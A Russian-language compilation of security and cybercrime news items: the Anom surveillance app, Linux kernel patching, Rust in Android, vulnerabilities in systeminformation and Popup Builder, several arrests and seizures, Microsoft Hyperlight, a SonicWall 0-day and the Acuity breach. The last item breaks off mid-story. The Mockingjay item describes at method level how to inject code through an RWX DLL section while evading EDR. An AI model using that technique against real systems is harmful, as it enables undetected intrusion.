Власти ранее выдвигали идею использования фантомного контакта для проникновения в зашифрованные сообщения. В статье, опубликованной на сайте Lawfare в ноябре 2018 года, Ян Леви и Криспин Робинсон, два сотрудника британского разведывательного управления GCHQ, написали, что «разработчик любого мессенджера может незаметно добавить представителя правоохранительных органов в групповой чат или звонок».
В разделе, который обрабатывает отправку сообщений, приложение прикрепляет информацию о местоположении к любому сообщению, отправляемому боту. Для работы приложения требовались специальные разрешения, включая разрешение «ACCESS_FINE_LOCATION». В результате многие из перехваченных сообщений Anom включали точное местоположение устройства по GPS на момент отправки.
Основной код для обработки сообщений был взят из приложения XMPP для обмена сообщениями с открытым исходным кодом. Сам код беспорядочен, большие куски закомментированы, и приложение постоянно регистрирует отладочные сообщения на самом телефоне.
[](https://www.securitylab.ru/upload/images/content- img(192).png)
Купер Куинтин, старший технолог активистской организации Electronic Frontier Foundation (EFF), считает "странным", что ФБР использовало обычных разработчиков для сверхсекретной правоохранительной операции.
«Представьте, если бы Raytheon (американский многонациональный аэрокосмический и оборонный конгломерат) нанял компанию по производству фейерверков, расположенную на той же улице, для изготовления ракетных капсюлей, но не сообщил им, что они делают ракетные двигатели», — сказал он.
Компания Motherboard не будет публиковать полный код приложения Anom. По их мнению, код содержит идентифицирующую информацию о тех, кто работал над приложением. Большинство людей, создававших приложение Anom, не знали, что программа была тайным инструментом ФБР для наблюдения за организованной преступностью. Раскрытие личностей разработчиков может подвергнуть серьезному риску их жизни. Motherboard не будет выпускать приложение в открытый доступ или распространять его дальше.
Издание отмечает, что получило код от источника, который предоставил копию APK-файла Anom, и намерено защищать его конфиденциальность.
source: vice.com/en/article/v7veg8/anom-app-source-code-operation-trojan- shield-an0m
Кейс Кук (Kees Cook), бывший главный системный администратор kernel.org и лидер Ubuntu Security Team, ныне работающий в компании Google над обеспечением защиты Android и ChromeOS, [выразил опасение](https://security.googleblog.com/2021/08/linux-kernel-security-done- right.html) текущим процессом исправления ошибок в стабильных ветках ядра. Еженедельно в стабильные ветки включается около ста исправлений, а после закрытия окна приёма изменений в следующий релиз приближается к тысяче (сопровождающие удерживают исправления до закрытия окна, а после формирования "-rc1" публикуют накопившееся разом), что слишком много и требует больших трудозатрат для сопровождения продуктов на базе ядра Linux.
По мнению Кейса процессу работы с ошибками в ядре не уделяется должное внимание и ядру не хватает как минимум 100 дополнительных разработчиков для скоординированной работы в этой области. Основные разработчики ядра регулярно исправляют ошибки, но нет никаких гарантий, что эти исправления будут перенесены в варианты ядра, используемые сторонними производителями. У пользователей различных продуктов на базе ядра Linux также нет возможности проконтролировать то, какие ошибки исправлены и какое ядро используется в их устройствах. В конечном счёте за безопасность своих продуктов отвечают производители, но в условиях очень большой интенсивности публикации исправлений в стабильных ветках ядра они оказались поставлены перед выбором - переносить все исправления, выборочно портировать самое важное или игнорировать все исправления.
Оптимальным решением был бы перенос только самых важных исправлений ошибок и уязвимостей, но в выделении подобных патчей из общего потока и состоит основная проблема. Наибольшее число всплывающих проблем является следствием использования языка Си, требующего большой аккуратности при работе с памятью и указателями. Усугубляет ситуацию то, что многие потенциальные исправления уязвимостей не снабжаются идентификаторами CVE или получают подобный идентификатор через какое-то время после публикации исправления. В подобных условиях производителям очень трудно разделить второстепенные исправления от важных проблем, влияющих на безопасность. По статистике более 40% уязвимостей устраняются до присвоения CVE и в среднем задержка между выпуском исправления и присвоением CVE составляет три месяца (т.е. вначале исправление воспринимается как обычная ошибка, но лишь спустя несколько месяцев становится ясно, что имело место устранение узявимости).
В итоге, не имея отдельной ветки с исправлениями уязвимостей и не получая сведений о связи с безопасностью той или ной проблемы, производителям продуктов на базе ядра Linux остаётся непрерывно переносить все исправлений из свежих стабильных веток. Но данная работа требует больших трудозатрат и сталкивается в компаниях с сопротивлением из-за опасения в появлении регрессивных изменений, способных нарушить нормальную работу продукта.
Напомним, что по мнению Линуса Торвальдса, все ошибки важны и уязвимости [не следует отделять](https://www.washingtonpost.com/sf/business/2015/11/05/net- of-insecurity-the-kernel-of-the-argument/) от других видов ошибок и выделять в отдельную более приоритетную категорию. Объясняется такое мнение тем, что для обычного разработчика, не специализирующегося на вопросах безопасности, не очевидна связь исправления с потенциальной уязвимостью (для многих исправлений лишь проведение отдельного аудита позволяет понять, что они касаются безопасности). По мнению Линуса, вопросами выделения из общего потока исправлений потенциальных уязвимостей должны заниматься специалисты по безопасности из команд, отвечающих за поддержку пакетов с ядром в дистрибутивах Linux.
Кейс Кук считает, что единственным решением для поддержания безопасности ядра при разумных долгосрочных затратах является перевод компаниями инженеров, занимающихся портированием исправлений в локальные сборки ядра, к совместной скоординированной работе над сопровождением исправлений и уязвимостей в основном ядре (upstream). В текущем виде, многие производители используют в своих продуктах не самые новые версии ядра и бэкпортируют исправления собственными силами, т.е. получается, что инженеры в разных компаниях дублируют работу друг друга, решая одну и ту же проблему.
Например, если 10 компаний, в каждой из которых один инженер занимается бэкпорированием одних и тех же исправлений, переориентируют данных инженеров на исправление ошибок в upstream, то они вместо портирования одного исправления могли бы исправить 10 разных ошибок для общей пользы или подключиться к рецензированию предлагаемых изменений и не допустить включения кода с ошибками в ядро. Ресурсы также можно было бы направить на создание новых инструментов для тестирования и анализа кода, которые позволили бы на ранней стадии автоматически выявлять типовые классы ошибок, которые всплывают вновь и вновь.
Кейс Кук также предлагает более активно использовать автоматизированное и fuzzing-тестирование непосредственно в процессе разработки ядра, применять системы непрерывной интеграции и отказаться от архаичного управления разработкой через email. В настоящее время эффективному тестированию мешает то, что основные процессы тестирования отделены от разработки и происходят уже после формирования релизов. Кейс также рекомендовал для снижения числа ошибок применять при разработке языки, обеспечивающие более высокий уровень безопасности, такие как Rust.
На этой неделе разработчики Google сообщили, что Android получит поддержку языка Rust, так как он более безопасен и позволит предотвратить появление ошибок, связанных с памятью. Ради этого инженеры Google 18 месяцев работали над созданием различных частей Android Open Source Project (AOSP) с помощью Rust, а теперь эту инициативу масштабируют, чтобы охватить больше аспектов ОС.
«Управляемые языки, такие как Java и Kotlin, — это оптимальный вариант для разработки приложений для Android. ОС Android широко использует Java, эффективно защищая большие части платформы Android от ошибок памяти. Но, к сожалению, для нижних уровней ОС Java и Kotlin не подходят», — рассказывают в компании.
Click to expand...
Дело в том, что написанный на C и C ++ код требует хорошей изоляции при парсинге ненадежных входных данных, и «сдерживание» такого кода в жестко ограниченной и непривилегированной песочнице может быть весьма сложным, а также вызывать различные проблемы и дополнительное использование памяти.
Кроме того, известно, что на ошибки безопасности памяти, связанные с C и C ++, приходится примерно 70% серьезных уязвимостей в Android. Поэтому в итоге, чтобы предотвратить появление подобных проблем, было принято решение переключиться на более безопасный язык, такой как Rust.
При этом разработчики Google не намерены переписывать весь существующий код на C и C ++, вместо этого они сосредоточат усилия на недавно измененном коде, где с большей вероятностью могут возникнуть ошибки, связанные с памятью. В частности на Rust полностью перепишут Bluetooth-стек Gabeldorsche, а также разработке уже находится сетевой стек для опенсорсной операционной системы Fuchsia.
Источник: xakep.ru/2021/04/09/rust-android/
В популярной Node.js библиотеке systeminformation, суммарно загруженной более 34 000 000 раз (более 800 000 загрузок в неделю), нашли уязвимость, допускавшую инъекции команд. Проблема получила идентификатор CVE-2021-21315.
Как не трудно догадаться по названию, будучи включена в код, библиотека systeminformation позволяет разработчикам получать системную информацию, связанную с процессором и другими компонентами, батареей, сетью, различными службами и системными процессами. По замыслу автора, использоваться все это должно в бэкэнде.
Уязвимость CVE-2021-21315 позволяла потенциальному злоумышленнику выполнять системные команды, осторожно внедряя пейлоады в некорректно очищенные параметры, используемые компонентом. Как видно на скриншоте ниже, в версии 5.3.1 баг был исправлен, и теперь библиотека очищает параметры, в частности проверяя, относятся ли они к string-данным.

Всем пользователям systeminformation рекомендуется как можно скорее обновиться до версии 5.3.1 и выше. Если же это по какой-то причине невозможно, команда безопасности npm выпустила бюллетень безопасности, в котором описаны обходные пути решения проблемы.
Источик: xakep.ru/2021/02/25/node-js-bug/
Исследователи WebARX предупреждают, что популярный плагин для WordPress Popup Builder (полное название: Popup Builder – Responsive WordPress Pop up – Subscription & Newsletter), установленный более чем на 200 000 сайтов, мог использоваться для выполнения различных вредоносных действий, включая рассылку спама.
Проблемы были обнаружены во всех версиях плагина вплоть до Popup Builder 3.71, и в настоящее время уже устранены разработчиками.
Эксперты пишут, что корень всех бед крылся в отсутствии авторизации для большинства методов AJAX. В итоге эти недочеты можно было использовать для рассылки информационных бюллетеней с произвольным содержанием, атак типа local file inclusion, для импорта или удаления подписчиков, а также для выполнения других вредоносных действий.
Хотя в плагине был реализован метод выполнения проверки, по сути методы AJAX не могли проверить возможности пользователя. Так, Popup Builder выполнял проверку токена nonce, и любой пользователь, прошедший такую проверку, мог использовать уязвимые методы AJAX. Проблема заключалась в том, что токен nonce отправляется всем пользователям.
Таким образом, для реализации атаки злоумышленнику требовалось лишь войти в систему и получить доступ к токену nonce. После этого баги Popup Builder позволяли, к примеру, рассылать информационные бюллетени с «настраиваемым содержимым тела электронного письма, отправителя email и несколькими другими атрибутами, которые, по сути, позволят атакующему отправить письма всем подписчикам».
Исследователи подчеркивают, что это возможности лишь одного из уязвимых методов и призывают всех обновить Popup Builder как можно скорее.
Источник: xakep.ru/2021/02/01/popup-builder/
Аресты были проведены в четверг в Косово, где задержали граждан этой страны — Ардита Кутлеши, Джетмира Кутлеши и Шпенд Соколли. Министерство юстиции США предъявило обвинения первым двоим в участии в операциях Rydox, и они ожидают экстрадиции в США.
В Косово задержаны Ардит Кутлеши (26 лет) и Джетмир Кутлеши (28 лет) при содействии местной полиции. Власти США подали запрос на экстрадицию арестованных. Кутлеши предъявлены обвинения в краже личных данных, сговоре с целью совершения кражи, мошенничестве с доступом к устройствам, отягчённой краже данных и отмывании денег. Максимальный срок наказания по предъявленным обвинениям составляет 37 лет тюремного заключения для каждого.
Ещё один фигурант, гражданин Косово Шпенди Соколи, был задержан в Албании. Сообщается, что Соколи предстанет перед судом в Албании, но причина отказа в экстрадиции не была озвучена представителями министерства.
Ардит и Джетмир Кутлеши обвиняются в нескольких преступлениях, связанных с их ролями администраторов на Rydox, включая кражу личных данных, сговор с целью кражи личных данных, мошенничество с платежными средствами и отмывание денег. Если они будут признаны виновными, каждому из них грозит до пяти лет за каждое обвинение, десять лет за мошенничество с платежными средствами и до 20 лет за отмывание денег.
С момента запуска в феврале 2016 года, продавцы на платформе Rydox совершили более 7 600 сделок, в ходе которых продавались украденные данные кредитных карт, логины, пароли и личные сведения (номера социального страхования, имена и адреса) тысяч американцев, а также различные инструменты для совершения киберпреступлений. Rydox также предлагал на продажу более 321 000 других «киберпреступных продуктов» более чем 18 000 пользователей, включая инструменты и материалы для совершения преступлений, такие как руководства и спам-инструменты.
По данным обвинения, для того чтобы совершить покупку, зарегистрированные пользователи должны были внести криптовалюту на свои счета в Rydox, а затем расплачиваться через Perfect Money, Ethereum, Litecoin, Bitcoin (BTC), Monero, Ripple, Tron или Verge, которые переводились на криптовалютные кошельки, контролируемые Rydox. После внесения средств они попадали под контроль обвиняемых, которые управляли кошельками платформы. Rydox также взимал единовременную плату за разрешение стать продавцом на платформе, сумма которой колебалась от 200 до 500 долларов. Продавцы получали 60% от доходов с продаж, в то время как сам рынок оставлял себе 40%.
США получили судебное разрешение на конфискацию домена Rydox[.]cc, через
который осуществлялся доступ к сайту преступного рынка. Также с помощью
Королевской полиции Малайзии ФБР изъяло серверы, на которых размещался сайт, и
закрыло его. Кроме того, США получили судебное разрешение на конфискацию около
225 000 долларов в криптовалюте с аккаунтов обвиняемых. Операция была
проведена с участием ФБР в Питтсбурге, Национального бюро расследований
Албании (BKH), Директората по борьбе с киберпреступностью Албании, Специальной
прокуратуры Косово, Косовской полиции и Королевской полиции Малайзии.
_
«Рынок Rydox был универсальным магазином, где более 18 000 его пользователей
могли выбрать из более чем 300 000 инструментов для киберпреступлений»_ ,
—отметил прокурор США Эрик Г. Олшан в четверг.
storage.courtlistener.com/recap/gov.uscourts.pawd.314293/gov.uscourts.pawd.314293.3.0.pdf
Компания Microsoft [представила](https://opensource.microsoft.com/blog/2024/11/07/introducing- hyperlight-virtual-machine-based-security-for-functions-at-scale/) проект Hyperlight, развивающий гипервизор, предназначенный для встраивания в приложения с целью изолированного выполнения кода, не заслуживающего доверия или требующего особой защиты. Гипервизор оформлен в виде разделяемой библиотеки, обеспечивающей выполнение отдельных функций в легковесных виртуальных машинах (micro-VM) и организующей обмен данными с этими функциями. Код проекта написан на языке Rust и [распространяется](https://github.com/hyperlight- dev/hyperlight) под лицензией Apache 2.0.
По сравнению с запуском традиционных виртуальных машин Hyperlight позволяет добиться низких задержек и минимальных накладных расходов. В Hyperlight задержки при создании виртуальных машин составляют 1-2 миллисекунды, что позволяет применять изоляцию на уровне запуска функций. Для сравнения запуск обычной виртуальной машины осуществляется не менее чем за 120 миллисекунд, а запуск изолированного sandbox-окружения для выполнения WebAssembly-кода при помощи Wasmtime runtime занимает 0.03 миллисекунды.
Для изоляции на платформе Linux поддерживается использование гипервизоров KVM и mshv (Microsoft Hypervisor в Azure Linux), а на платформе Windows - WHP (Windows Hypervisor Platform) и WSL2 (Windows Subsystem for Linux 2) c KVM. Платформа macOS пока не поддерживается. Отдельное ядро и операционная система в виртуальной машине не используются. Начинка для виртуальной машины формируется в форме самодостаточной загружаемой программы, включающей код запускаемой функции в обвязке из runtime и специализированного минимального ядра. В виртуальной машине используется единый линейный фрагмент памяти и назначается виртуальный CPU, без маппинга устройств и без разделения на процессы.
Процесс разработки основан на связывании основного кода приложения с библиотекой Hyperlight Host, координирующей запуск виртуальных машин, а кода запускаемых изолированном режиме функций (гостевых функций) с библиотекой Hyperlight Guest, предоставляющей API для взаимодействия с внешней частью приложения и возможности для обособленного выполнения кода без окружения операционной системы.
[](https://opensource.microsoft.com/blog/wp-
content/uploads/2024/11/Hyperlight-1-2-seconds-png.webp)
Предоставляемая прослойка для взаимодействия между хост-приложением и изолированными функциями позволяет не только вызывать изолированные функции из хост-приложений, но и наоборот, обращаться к функциям хост-приложений из изолированных функций. Список внешних функций, допустимых для вызова из изолированных функций, жёстко регламентируется. По умолчанию доступ из изолированных функций ограничен минимальным API, позволяющим передавать сообщения хост-приложению.
В будущем Microsoft планирует передать проект некоммерческой организации Cloud Native Computing Foundation (CNCF) для совместного развития на нейтральной площадке, не зависящей от отдельных производителей. Организация CNCF работает под крылом Linux Foundation и курирует разработку таких проектов, как Kubernetes, etcd, Cilium, Containerd, cri-o, Flux, Helm, Istio и gRPC.
Теперь горе-взломщику придётся ответить за свои действия по всей строгости закона.
Вчера, 20 августа, в американском городе Лондон, штат Кентукки, 39-летний житель Сомерсета, Джесси Кипф ( Jesse Kipf ), был приговорён к 81 месяцу (6,75 лет) тюремного заключения за компьютерное мошенничество и кражу личных данных. Кипф признал вину в том, что в январе 2023 года незаконно получил доступ к компьютерной системе регистрации смертей штата Гавайи.
Используя учётные данные врача из другого штата, обвиняемый создал фиктивное дело о своей смерти. После этого Кипф заполнил анкету для свидетельства о смерти и даже заверил её цифровой подписью того же врача, чтобы быть зарегистрированным как умерший в различных государственных базах данных. Одной из причин его действий было уклонение от выплаты алиментов на ребёнка.
Помимо этого, Кипф взломал системы регистрации смертей в других штатах, а также проник в сети частных компаний и государственных организаций. С использованием украденных данных он пытался продать доступ к этим сетям в даркнете, который часто ассоциируется с нелегальными товарами и услугами.
Прокурор Соединённых Штатов по Восточному округу Кентукки, Карлтон Шиер IV, назвал эту схему бестактной и циничной, отметив, что такие преступления подчёркивают важность компьютерной безопасности. Он также добавил, что этот случай станет предупреждением для других киберпреступников.
Майкл Э. Стэнсбери, специальный агент ФБР в Луисвилле, подчеркнул, что пострадавшие от кражи личных данных могут столкнуться с пожизненными последствиями, и ФБР будет преследовать тех, кто совершает подобные преступления.
Согласно федеральному законодательству, Кипф обязан отбыть в тюрьме не менее 85% своего срока. После выхода на свободу за ним будут пристально следить ещё в течение трёх лет. Ущерб, нанесённый государственным и корпоративным компьютерным системам, а также невыплаченные алименты составили почти 196 тысяч долларов.
Этот случай наглядно демонстрирует, что попытки уклониться от ответственности, прибегая к киберпреступлениям, могут привести к гораздо более серьёзным последствиям, чем те, которых обычно пытаются избежать технически подкованные компьютерные пользователи. Технологии, используемые злоумышленниками для обмана, неизбежно оборачиваются против них самих, подчёркивая важность цифровой безопасности и необходимости строгих мер по защите личных данных.
justice[.]gov/usao-edky/pr/pulaski-county-man-sentenced-cyber-intrusion-and- aggravated-identity-theft
Полиция Гонконга арестовала 43 человека по подозрения в причастности к 32 случаям кибермошенничества на сумму 28,75 миллиона гонконгских долларов (352,6 миллиона рублей). Изданию South China Morning Post стало известно, что большая часть подозреваемых использовалась для открытия банковских счетов.
Как выяснила местная полиция, лишь треть задержанных связаны с мошенническими операциями напрямую. Все остальные получали вознаграждения за то, что через их счета отмывались грязные деньги. Их вербовали в социальных сетях, обещая щедрое вознаграждение, доходившее порой до десятков тысяч рублей. Однако расследование показало, что многие из них так ничего и не получили.
В полиции полагают, что большая часть совершенных синдикатом операций касалась онлайн-мошенничества и фиктивных инвестиционных сделок. Их жертвами стали 65 человек в возрасте от 21 до 65 лет. Свидетельства преступлений поступали в полицию Гонконга с мая 2021 года по март 2023-го. Итогом расследования стала спецоперация Swiftpower, в ходе которой во второй половине июля были арестованы 29 мужчин и 14 женщин в возрасте от 19 до 64 лет. Всем им предъявлены обвинения в отмывании денег и завладении имуществом обманным путем, и все они были выпущены под залог.
Отмывание денег наказывается лишением свободы на срок до 14 лет и штрафом в размере 5 миллионов гонконгских долларов (61,3 миллиона рублей). Завладение имуществом обманным путем при самом худшем для обвиняемых приговоре повлечет наказание в 10 лет заключения.
source: msn.com/en-xl/news/other/hong-kong-police-arrest-43-people- over-32-cases-of-cyber-fraud-totalling-more-than-hk-28-million-most-suspects- recruited-to-set-up-bank-accounts/ar-AA1eCwVy
Эксперты из компании [Security Joes](https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in- userland-to-achieve-code-execution) представили новую технику внедрения кода в процессы, которая получила название Mockingjay. Этот метод позволяет злоумышленникам обходить EDR-решения и другие защитные продукты, добиваясь скрытого выполнения вредоносного кода в скомпрометированных системах.
Внедрение кода в процесс (process injection) — это техника выполнения произвольного кода в адресном пространстве другого запущенного процесса, которому доверяет операционная система. Это дает злоумышленникам возможность запускать вредоносный код без обнаружения.
Примерами таких внедрений являются DLL-инжекты, PE-инжекты, отраженные DLL- инжекты, перехват выполнения потока, техника process hollowing и прочие. Во всех этих случаях злоумышленникам нужно использовать API-интерфейсы Windows и различные системные вызовы, создавать процессы/потоки, осуществлять запись в память процессов и так далее. Следовательно, защитные решения могут обнаружить подозрительную активность и вмешаться в происходящее по мере необходимости.
Эксперты Security Joes заявляют, что их метод Mockingjay выгодно отличается от других тем, что не использует вызовы Windows API, не устанавливает специальные разрешения, не занимается выделением памяти (memory allocation) и даже не запускает потоки внутри целевого процесса, что сводит риск обнаружения к минимуму.
Исследователи рассказывают, что задались целью найти уязвимую DLL с RWX (Read- Write-Execute) по умолчанию, чтобы можно было изменить содержимое для загрузки вредоносного кода, не выполняя дополнительных действий, которые могли бы вызвать подозрение у защитного ПО.
В поисках подходящей библиотеки DLL аналитики обнаружили в Visual Studio 2022 Community библиотеку DLL msys-2.0.dll, которая по умолчанию имела RWX размером 16 КБ. В компании поясняют, что, используя уже существующий раздел RWX, можно воспользоваться присущей ему защитой памяти, эффективно обходя EDR.
«Такой подход не только позволяет обойти ограничения, налагаемые хуками пользовательского пространства, но и создает прочную и надежную среду для нашей техники инжектов», — рассказывают эксперты.
Click to expand...
После этого команда исследователей разработала два разных метода инжектов: self-injection и remote process injection. При первом подходе кастомное приложение используется для прямой загрузки уязвимой DLL в адресное пространство и выполнения желаемого кода с использованием RWX. Второй подход предлагает использовать раздел RWX в уязвимой DLL для выполнения внедрения в удаленный процесс, такой как ssh.exe.
Оба метода, используемые Mockingjay, задействуют API Windows, включая LoadLibraryW, CreateProcessW и GetModuleInformation, для загрузки неправильно сконфигурированной DLL и поиска RWX-раздела. Однако EDR-решения обычно отслеживают API WriteProcessMemory, NtWriteVirtualMemory, CreateRemoteThread и NtCreateThreadEx, которые чаще используются в подобных атаках, а значит, техника Mockingjay с меньшей вероятностью спровоцирует срабатывание защитных механизмов.
Спустя почти год усилиями всего мира похищенные средства возвращаются владельцам.
Норвежские власти заявили , что они конфисковали украденную криптовалюту на 60 млн. крон (почти $5,9 млн.) в рамках расследования атаки на Sky Mavis и ее игру Axie Infinity.
В заявлении отмечается, что это крупнейшая конфискация криптовалюты, когда- либо произведенная норвежской полицией, и одна из крупнейших конфискаций наличных денег, когда-либо произведенных в Норвегии. Власти продолжают работать со специалистами ФБР над отслеживанием похищенной криптовалюты.
Норвежские правоохранительные органы стали вторыми, кто вернул украденную у Axie Infinity криптовалюту. Первым это сделало правительство США в сентябре с помощью блокчейн-аналитиков и агентов ФБР. Им удалось изъять у группировки Lazarus украденную криптовалюту на сумму $30 млн. Это был первый в истории случай изъятия похищенной криптовалюты у группировки северокорейских хакеров.
Напомним, что 23 марта 2022 года стало известно о краже криптовалюты на сумму около $625 млн. из блокчейна Ronin , лежащего в основе популярной криптоигры Axie Infinity. Ни одна из хакерских групп официально о взломе не заявляла. Однако, американские власти определили, что адрес цифровой валюты, используемый хакерами, находится под контролем северокорейской хакерской группы Lazarus.
source: okokrim.no/rekordhoegt-kryptobeslag-i-axie- saka.6585492-549344.html%D1%8D
23 ноября 2022 года, Рыбинский городской суд Ярославской области рассмотрел уголовное дело в отношении трех местных жителей в возрасте от 27 лет до 41 года.
В зависимости от роли и степени участия они признаны виновными в совершении серии преступлений, предусмотренных ч. 4 ст. 159.6 УК РФ (мошенничество в сфере компьютерной информации).
В суде установлено, что в 2016 году подсудимые договорились о создании организованной группы с четким распределением ролей и иерархией с целью хищения денежных средств через Интернет.
Через сайт объявлений они получали номера сотовых телефонов пользователей и, используя специальное оборудование, направляли им от имени других пользователей сайта сообщения, после открытия которых в электронную память смартфонов потерпевших устанавливались вредоносные программы. Тем самым соучастники получали доступ к входящим сообщениям владельцев телефонов, и отправляли через услугу «мобильный банк» сообщения о перечислении денежных средств на подконтрольные им карты и счета.В результате преступной деятельности причинен ущерб в сумме около 800 тысяч рублей 75 жителям Ярославской, Вологодской, Кировской, Саратовской, Самарской областей, республики Чувашия и других субъектов Российской Федерации.
С учетом позиции государственного обвинителя в зависимости от содеянного суд назначил виновным наказание в виде лишения свободы на срок от 4 до 6 лет с отбыванием наказания в исправительной колонии общего режима.
Приговор в законную силу не вступил.
Уголовное дело расследовалось сотрудниками регионального УМВД.
source: epp.genproc.gov.ru/web/proc_76/mass-media/news?item=78418061
Cisco внесла значительный вклад в развитие борьбы с киберпреступностью.
Три метода Cisco Talos направлены на обнаружение сайтов вымогателей в дарквебе . Согласно блогу под названием «Деанонимизация доменов программ-вымогателей в дарквебе» , методы способны обеспечить дополнительную видимость темных веб- сайтов.
Старший инженер-исследователь угроз Cisco Talos Пол Юбэнкс поделился способами, которые использует Cisco Talos для раскрытия преступных доменов:
Первый метод сопоставляет серийный номер TLS-сертификата киберпреступника с
номером, проиндексированным в общедоступном Интернете;
Второй способ проверяет соответствие фавикона браузера в даркнете с
общедоступным веб-сайтом;
Третий метод использует «катастрофические ошибки безопасности» и неправильные
конфигурации, снижающие анонимность.
По словам Юбэнкса, «методы сами по себе не новые, но ранее они не применялись для раскрытия доменов программ-вымогателей». Юбенкс добавил, что сайты вымогателей часто не используют TLS-сертификаты, поскольку их можно использовать для идентификации. Однако, киберпреступник может поддерживать сертификат на своем даквеб-сайте, «чтобы создать у своих жертв иллюзию безопасности и легитимности».
source: blog.talosintelligence.com/2022/06/de-anonymizing-ransomware-domains- on.html
ИБ-специалисты компании NCC Group обнаружили, что загадочная уязвимость нулевого дня в сетевых устройствах SonicWall уже находится под "беспорядочным" атаками. Так как патча до сих пор нет, подробная информация о природе бага не разглашается, чтобы к атакам не присоединились другие хакеры. Разработчиков SonicWall уведомили о происходящем еще в минувшие выходные.
__https://twitter.com/x/status/1355850304596680705
Один из экспертов NCC Group рассказал изданию ZDNet следующее:
«Ранее на неделе мы заметили, что один злоумышленник уже использует [0-day]. В то время мы только подняли ханипот, поэтому не получили полного запроса. Но это побудило нас провести реверс-инжиниринг на основе пути запроса, и мы выявил ошибку, которую, как мы считаем, эксплуатировал злоумышленник».
Click to expand...
При этом аналитики убеждены, что обнаружили ту самую уязвимость нулевого дня, при помощи которой таинственный злоумышленник недавно взломал саму компанию SonicWall, проникнув во внутреннюю сеть производителя.
Напомню, что в конце января стало известно, что SonicWall пострадала в ходе «скоординированной хакерской атаки». Представители компании до сих пор не сообщают никаких подробностей об этом инциденте, лишь пишут, что уязвимыми перед неизвестной 0-day проблемой следует считать Secure Mobile Access (SMA) версии 10.x, работающий на аппаратных решениях SMA 200, SMA 210, SMA 400, SMA 410 и виртуальной SMA 500v. Также «под следствием» пока остаются и устройства SMA серии 100.
Источник: xakep.ru/2021/02/01/sonicwall-0day-attacks/
Кибершпионаж в Азиатско-Тихоокеанском регионе
• Китайская APT нацелена на правительственные организации в Тайване и других
странах APAC.
• Угроза использует уязвимость GeoTools OSGeo GeoServer для проникновения.
• Злоумышленник Earth Baxia обвиняется в использовании фишинговых писем и
поддельных документов.
• Атака включает использование Cobalt Strike и EAGLEDOOR для сбора данных и
доставки полезной нагрузки.
• NTT Security Holdings сообщает о похожих атаках на военные и энергетические
организации в Тайване, Филиппинах и Вьетнаме.
• Атаки могут быть связаны с использованием одних и тех же методов и доменов
C2.
• Конечная цель - развертывание пользовательского варианта Cobalt Strike и
бэкдора EAGLEDOOR.
• Вредоносная программа поддерживает различные протоколы связи и использует
Telegram Bot API для загрузки файлов.
• Исследователи отмечают сложность и адаптивность кампании Earth Baxia.
Организовал махинации сорокалетний украинец из Днепра. В качестве исполнителей привлек двух граждан Украины и шестерых объявленных в международный розыск за мошенничество в составе преступной организации граждан Чехии.
Злоумышленники пользовались виртуальной телефонией с подменой номера и звонили жителям Чехии, представляясь сотрудниками государственного контролирующего банковского органа. В ходе разговора они склоняли потерпевших предоставить удаленный доступ к своему телефону или компьютеру или же узнавали реквизиты банковской карты и переводили средства на подконтрольные счета. В нескольких случаях мошенники убедили своих жертв снять наличные и передать подставному курьеру, который якобы должен был доставить их в безопасное место.
Таким образом им удалось обмануть по меньшей мере шестнадцать жителей Чехии на более 5,5 миллионов гривен. Полученные от противоправной деятельности средства конвертировали в криптовалюту или обналичивали для покупки элитных авто и недвижимости, которые регистрировали на друзей и родственников.
Киберполицейские установили местонахождение и личности преступников. Правоохранители провели 23 обыска, в результате которых при силовой поддержке бойцов КОРД, батальона полиции особого назначения и оперативников уголовного розыска ГУНП в Одесской области задержали всех девятерых участников преступной схемы вместе с организатором. В ходе обыска изъяли компьютерную технику и мобильные телефоны с доказательствами совершенных преступлений, а также элитные авто фигурантов и более ста тысяч долларов в разной валюте.
Следователи Нацполиции объявили украинским фигурантам о подозрении в мошенничестве, совершенном в особо крупных размерах преступной организацией. Им грозит до двенадцати лет лишения свободы с конфискацией имущества. Иностранные преступники задержаны на основании поручения прокурора, в суд направлены ходатайства для направления в суд с целью их дальнейшей экстрадиции в Чехию.
Это уже второй случай успешного расследования противоправной деятельности call-центров в рамках соглашения о создании совместной следственной группы (JIT) с чешскими правоохранителями. В сентябре 2023 года Национальная полиция Украины экстрадировала шестерых мошенников представителям правоохранительных органов Чехии - сейчас они находятся под стражей.
• Source: hххps://od.npu.gov.ua/news/ukrainski-politseiski-likviduvaly- shakhraiskyi-call-tsentr-v-odesi-de-hromadian-chekhii-oshukaly-na-55-milioniv- hryven
Государственный подрядчик США, компания Acuity, подтвердила факт взлома своих репозиториев на GitHub, в результате которого злоумышленники похитили документы. По утверждению компании, похищенная информация являлась «устаревшей и не содержала конфиденциальных данных».
Технологическая консалтинговая фирма Acuity оказывает услуги в области DevSecOps, модернизации ИТ-операций, кибербезопасности, аналитики данных и поддержки операций для федеральных заказчиков в сфере национальной безопасности.
Госдепартамент США сообщил BleepingComputer о расследовании заявлений хакеров после того, как киберпреступник под псевдонимом IntelBroker опубликовал якобы похищенные данные американского правительства и военных на хакерском форуме. По соображениям безопасности Госдепартамент не может предоставить детали по природе и объему утечки.
Acuity подтвердила взлом репозиториев на GitHub и заявила, что они содержат устаревшую и несекретную информацию. Сразу после обнаружения уязвимости компания применила обновления безопасности от поставщика ПО и предприняла меры по устранению угрозы согласно рекомендациям поставщика.
После проведения собственного анализа и расследования с привлечением сторонних ИБ-специалистов, в Acuity не обнаружили доказательств компрометации конфиденциальных данных клиентов. Компания тесно сотрудничает с правоохранительными органами и принимает соответствующие меры для дальнейшей защиты своих операций.
Один из участников атаки, известный как IntelBroker, опубликовал записи с информацией, принадлежащей сотрудникам Министерства юстиции, госдепартамента, АНБ и ФБР. Хакер также утверждает, что украденные файлы содержат секретные данные разведывательного альянса Five Eyes.
Другой хакер под псевдонимом Sangierro, стоящий за атакой, сообщил BleepingComputer, что взлом произошел 7 марта. По его словам, злоумышленникам удалось использовать уязвимость на сервере CI/CD Acuity для кражи учетных данных GitHub и доступа к частным репозиториям.
IntelBroker наиболее известен взломом страховой компании DC Health Link, который привел к слушаниям в Конгрессе после того, как он раскрыл личные данные членов и сотрудников Палаты представителей США. Другой случай, связанный с IntelBroker – взлом компании General Electric, в ходе которого хакер украл сведения о военных проектах агентства DARPA, включая SQL-файлы, технические документы и стратегические отчеты. Facebook Marketplace, Международный аэропорт Лос-Анджелеса (LAX) также являются жертвами хакера.
Сотрудники милиции в одном из сельхозорганизаций района выявили системные хищения денежных средств. Преступную схему придумала 51-летняя главный бухгалтер, втянув в неё троих подчинённых.
